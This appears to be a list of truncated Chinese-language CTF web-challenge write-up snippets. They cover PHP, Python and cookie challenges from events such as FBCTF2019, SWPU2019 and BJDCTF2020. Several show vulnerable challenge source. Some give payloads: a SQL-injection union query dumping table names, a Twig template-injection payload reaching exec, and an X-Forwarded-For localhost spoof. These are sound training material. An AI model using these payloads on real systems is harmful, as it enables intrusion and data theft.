[Zer0pts2020]Can you guess it? 思路 有源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I…

[FBCTF2019]RCEService 思路 看了WP才知道有题目源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { …

[SUCTF 2019]Pythonginx 思路 看到源代码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == '…

[BJDCTF2020]EasySearch 思路 扫描到index.php.swp文件（并没有 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*…

[极客大挑战 2019]RCE ME 思路 看代码 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_matc…

[BSidesCF 2019]Kookie 解题 跟着题目提示改Cookie就行 [CISCN 2019 初赛]Love Math 思路 挺有意思的一道题 <?php error_reporting(0); //听说你很喜欢数学，不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(_…

[SWPU2019]Web1 思路 广告名输入1'，发现注入点 解题 # 爆表名 1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/from/**/mysql.innodb_table…

[MRCTF2020]PYWebsite 思路 线索很清晰（真的吗 解题 抓包，加入localhost看看X-Forwarded-For: 127.0.0.1 flag{e22e0969-236e-4ee2-95b2-84c6fca7d37c} 注意 了解http的header字段属性 [ASIS 2019]Unicorn shop 思路 挺有意思…

[MRCTF2020]Ezpop 思路 直接看源码 <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%…

[BJDCTF2020]Cookie is so stable 思路 从题目中获得提示要关注cookie 解题 试了一下，是SSTI注入 PHP7.3.13，那么挨个试试，应该是Twig，形如{{2+2}}的格式找个注入payload就行：{{_self.env.registerUndefinedFilterCallback("exec")}}{{…